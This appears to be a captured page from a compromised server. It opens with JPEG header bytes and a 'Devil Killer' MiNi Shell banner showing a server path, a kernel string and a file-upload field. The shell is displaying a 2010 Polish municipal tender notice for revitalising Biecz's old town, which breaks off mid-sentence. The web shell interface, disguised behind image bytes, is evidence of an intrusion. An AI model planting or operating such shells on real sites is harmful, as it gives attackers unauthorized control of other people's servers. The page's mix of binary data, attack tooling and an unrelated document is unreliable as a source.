JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100825/265126-N-2010.html

<p class="kh_header"><b>Biecz: Rewitalizacja układu staromiejskiego miasta Biecz dla rozwoju produktu turystycznego - część I, etap 2 w ramach Małopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 265126 - 2010; data zamieszczenia: 25.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biecz , Rynek 1, 38-340 Biecz, woj. małopolskie, tel. 013 4471113, faks 013 4471113.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biecz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja układu staromiejskiego miasta Biecz dla rozwoju produktu turystycznego - część I, etap 2 w ramach Małopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania: Rewitalizacja układu staromiejskiego miasta Biecz dla rozwoju produktu turystycznego - część I, etap 1 w ramach Małopolskiego Regionalnego Programu Operacyjnego  na lata 2007-2013

Zadanie 1:  Przebudowa uliczek  przyległych do Rynku.
Przedmiot zamówieni obejmuje roboty budowlane drogowe, sieci wodociągowych i kanalizacji sanitarnej               i opadowej, sieci elektrycznej oświetlenia zgodnie z dokumentacją i projektową:
	a).w zakresie branży drogowej :Projekt Budowlany z lipca 2009 r. - projektant 
    mgr inż. Robert Waniczek  oraz STWiOR z lutego 2010 r. sporządzonych
    przez PP MAGNUS MEDIA Kraków,
b). w zakresie branży sanitarnej: Projekt Budowlany  z 2009 r. -projektant 
     mgr inż. Jacek Pietruszka oraz STWIOR sporządzonych przez BP-U PROEKO
      Nowy Sącz;
c). branży elektrycznej: Projekt Budowlany z czerwca 2009 r. -projektant 
     inż. Bohdan Ostański oraz STWIOR sporządzonych przez ZE DZIEWOŃSKI
     Wieliczka.
Zadanie 1 składa się z następujących etapów:
Etap I. Potockiego: przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), przebudowa sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji opadowej, oświetlenie uliczne;
Etap II. Kromera: przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), przebudowa sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji opadowej, oświetlenie uliczne;
Etap III. Barianów - Rokickich: przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), przebudowa sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji opadowej, oświetlenie uliczne;
Etap IV. Januszewicza: przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), oświetlenie uliczne;
Etap V. Krzemińskiego:  przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), oświetlenie uliczne, przebudowa schodów; 
Etap VI. Piekarska: przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), przebudowa sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji opadowej, oświetlenie uliczne;
Etap VII. W. Pola: przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), przebudowa sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji opadowej, oświetlenie uliczne;
Etap VIII. Ariańska: przebudowa nawierzchni jezdni i chodników (kostka granitowa lub brukowa), przebudowa sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji opadowej, oświetlenie uliczne.

 Zadanie 2:  Przebudowa ulicy Ligęzów wraz z wykonaniem miejsc parkingowych: remont nawierzchni asfaltowej, wykonanie chodnika dla pieszych, wykonanie nawierzchni z kostki brukowej                    z podziałem na miejsca postojowe.
Przedmiot zamówieni obejmuje roboty budowlane drogowe zgodnie z dokumentacją  projektową                        w zakresie branży drogowej : Projekt Budowlany z lipca 2009 r. - projektant  mgr inż. Robert Waniczek  oraz STWiOR z lutego 2010 r. sporządzonych przez PP MAGNUS MEDIA Kraków.




Zadanie  3:   Wykonanie miejsc parkingowych przy ul. Bochniewicza. 
Przedmiot zamówieni obejmuje roboty budowlane drogowe zgodnie z dokumentacją Projektową w zakresie branży drogowej : Projekt Budowlany z lipca 2009 r. - projektant mgr inż. Robert Waniczek  oraz STWiOR               z lutego 2010r. sporządzonych przez PP MAGNUS   MEDIA Kraków.

    Zadanie  4:   Przystosowanie budynku Rynek 18 ( zaplecza) na cele kulturalne.
Przedmiot zamówieni obejmuje roboty budowlane drogowe zgodnie z dokumentacją projektową                         w zakresie branży drogowej : Projekt Budowlany z lipca 2009 r. - projektant  mgr inż. Andrzej Zająć  oraz STWiOR z lutego 2010r. sporządzonych przez PP MAGNUS   MEDIA Kraków.

Zadanie 5: Zagospodarowanie placu Kromera na cele wypoczynkowe: wykonanie alejek spacerowych, wykonanie oświetlenia, wykonanie małej architektury - ławki, wykonanie aranżacji  zieleni.
Przedmiot zamówieni obejmuje roboty budowlane drogowe, sieci elektrycznej oświetlenia zgodnie                        z dokumentacją  projektową:	
	a).w zakresie branży drogowej :Projekt Budowlany z lipca 2009 r. - projektant 
    mgr inż. Robert Waniczek  oraz STWiOR z lutego 2010 r. sporządzonych
    przez PP MAGNUS MEDIA Kraków
b). branży elektrycznej: Projekt Budowlany z czerwca 2009r-projektant 
     inż. Bohdan Ostański oraz STWIOR sporządzonych przez ZE DZIEWOŃSKI
     Wieliczka.

Zadanie 6: Przystosowanie byłego placu targowego przy ul. Tumidajskiego na parking: wykonanie nawierzchni z kostki brukowej z podziałem na miejsca postojowe, budowa budynku sanitariatu, przełożenie wodociągu, przyłącz wody i kanalizacji sanitarnej, kanalizację deszczową, instalacje wod-kan                            i wentylacji mechanicznej.
Przedmiot zamówieni obejmuje roboty budowlano-konstrukcyjne, drogowe, sieci i instalacji
sanitarnych, instalacji elektrycznych zgodnie z dokumentacją  projektową:
		a). Projekt zagospodarowania działki z czerwca 2009r- projektant
     mgr inż. arch. Tadeusz Dąbrowski;
b).Projekt budowlany (architektura+konstrukcja) szalety miejskie z lipca 2009r :
     projektant mgr inż. arch. Tadeusz Dąbrowski;
c).Projekt budowlany branży sanitarnej z czerwca 2009 r.: projektant 
    mgr inż.Mirosław Syc,
d). Projekt budowlany branzy elektrycznej z czerwca 2009 r.: projektant 
     mgr inż. Krzysztof Filipiak,
e). Projekt budowlany branży drogowej z czerwca 2009 r.: projektant
       mgr inż. Peter Eross.

Zadanie 7: Zagospodarowanie brzegów rzeki Ropy: wykonanie alejek spacerowych, lampy solarne, wykonanie małej architektury.
Przedmiot zamówieni obejmuje roboty budowlane drogowe i urządzenia terenu wraz z lampami solarnymi zgodnie z dokumentacją  projektową w zakresie branży drogowej : Projekt Budowlany z lipca 2009r - projektant  mgr inż. Robert Waniczek  oraz STWiOR  z lutego 2010 r. sporządzonych przez PP MAGNUS MEDIA Kraków.


Zadanie 8:  Przebudowa warstwy nawierzchniowej i oświetlenie uliczne na ul. Węgierskiej i Grodzkiej (z wyłączeniem nawierzchni chodnika).
Przedmiot zamówieni obejmuje roboty budowlane drogowe, sieci elektrycznej oświetlenia zgodnie                       z dokumentacją  projektową:
	a).w zakresie branży drogowej :Projekt Budowlany z lipca 2009 r. - projektant 
    mgr inż. Robert Waniczek  oraz STWiOR z lutego 2010 r. sporządzonych
    przez PP MAGNUS MEDIA Kraków
b). branży elektrycznej: Projekt Budowlany z czerwca 2009r-projektant 
     inż. Bohdan Ostański oraz STWIOR sporządzonych przez ZE DZIEWOŃSKI
     Wieliczka.

Zadanie 9: Wykonanie alejek spacerowych przy murze obronnym od strony zachodniej                              i północnej (przy dzwonnicy, baszcie kowalskiej).
Przedmiot zamówieni obejmuje roboty budowlane drogowe i urządzenia terenu zgodnie  z dokumentacją  projektową w zakresie branży drogowej :Projekt Budowlany z lipca 2009 r. - projektant  mgr inż. Robert Waniczek  oraz STWiOR z lutego 2010 r. sporządzonych przez  PP MAGNUS MEDIA Kraków

Zadanie 10: Zagospodarowanie parku miejskiego: wykonanie alejek spacerowych, remont oświetlenia, wykonanie małej architektury - ławki, altany, wykonanie miejsca do zabawy dla dzieci (piaskownica, zjeżdżalnia), wykonanie aranżacji  zieleni.
Przedmiot zamówieni obejmuje:
1). roboty budowlane drogowe i urządzenia terenu i zieleni zgodnie z dokumentacją
  projektową  z czerwca 2009r w zakresie branży:
	a). architektura i konstrukcja- projektant: mgr inż. arch. Tadeusz Dąbrowski;
	b). aranżacje i wizualizacje- projektant: Anna Dąbrowska
	c). urządzenie zieleni: projektant: inż. Edyta Podstołowicz.
2). Zaprojektowanie i wykonanie robót remontowych i konserwacji oświetlenia 
    ( lampy typu Parkowy - szt. 12).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości: 70 000,00 zł - słownie: siedemdziesiąt tysięcy złotych.
Wadium może być wnoszone w następujących formach:
-	pieniądzu (wyłącznie przelewem na rachunek bankowy zamawiającego),
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt. 2 ustawy z dnia                       9 listopada  2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Wadium wnoszone w formie pieniądza należy wpłacić na konto zmawiającego: 16 8627 0001 2002 3000 0954 0002.
WADIUM WNOSZONE W INNEJ FORMIE NIŻ W PIENIĄDZU (PRZELEW)  NALEŻY ZŁOŻYĆ                      W ORYGINALE W  KASIE ZAMAWIAJĄCEGO.

TERMIN WNIESIENIA WADIUM W KAŻDEJ FORMIE:
do dnia 09.09.2010 r.

Uwaga !
W przypadku wniesienia wadium w formie pieniądza za termin wniesienia wadium przyjmuje się datę uznania  na rachunku Zamawiającego !

Zamawiający zwróci wadium zgodnie z art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia zamawiający uzna wykonanie                     zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, w okresie pięciu ostatnich lat  (a jeżeli a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed upływem terminu składania ofert, co najmniej jednego zamówienia o wartości minimum 60% wartości kosztorysowej oferty, z podaniem ich rodzaju i wartości, daty  i miejsca wykonania a także  załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający uzna wykazanie się przez wykonawcę kierownikami budów o następujących kwalifikacjach:
w zakresie branży budowlanej: posiada uprawnienia konstrukcyjno - budowlane, bądź konstrukcyjno - inżynieryjne,
w zakresie branży drogowej: posiada uprawnienia konstrukcyjno - budowlane bez ograniczeń lub drogowe,
w  zakresie branży sanitarnej: posiada uprawnienia budowlane  w zakresie  sieci i instalacji sanitarnych,
w  zakresie branży elektrycznej: posiada uprawnienia budowlane w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Kierownik budowy branży drogowej powinien posiadać uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych na podstawie :
      - par. 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie     zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych ( Dz. U. z 1964 r. Nr 31, poz. 197 )
lub
      -  par. 18 i 20  rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielenia zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikowania osób, które maja prawo prowadzenia tej działalności ( Dz. U. z 1994 r. Nr 16, poz. 55 )
 lub
- rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. ( Dz. U. z 2004 r.  Nr 150. poz. 1579)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku znajdowania się w sytuacji finansowej zapewniającej wykonanie zmówienia zamawiający uzna wykazanie przez wykonawcę posiadania w banku lub spółdzielczej kasie oszczędnościowo - kredytowej, w których wykonawca posiada rachunek,  środków  finansowych lub zdolności kredytowej w kwocie nie mniejszej niż 50 % wartości brutto wynikającej ze złożonej oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Oferta na formularzu ofertowym,
 2) Zestawienie wartości oferty wynagrodzenia ryczałtowego,
  3) Dokument (np. pełnomocnictwo, umowa spółki cywilnej, zaświadczenie o wpisie do ewidencji działalności gospodarczej, itp.) potwierdzający, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że postanowienia umowy mogą zostać zmienione w następującym zakresie:

1.	Termin realizacji zamówienia może ulec zmianie ze względu na: 

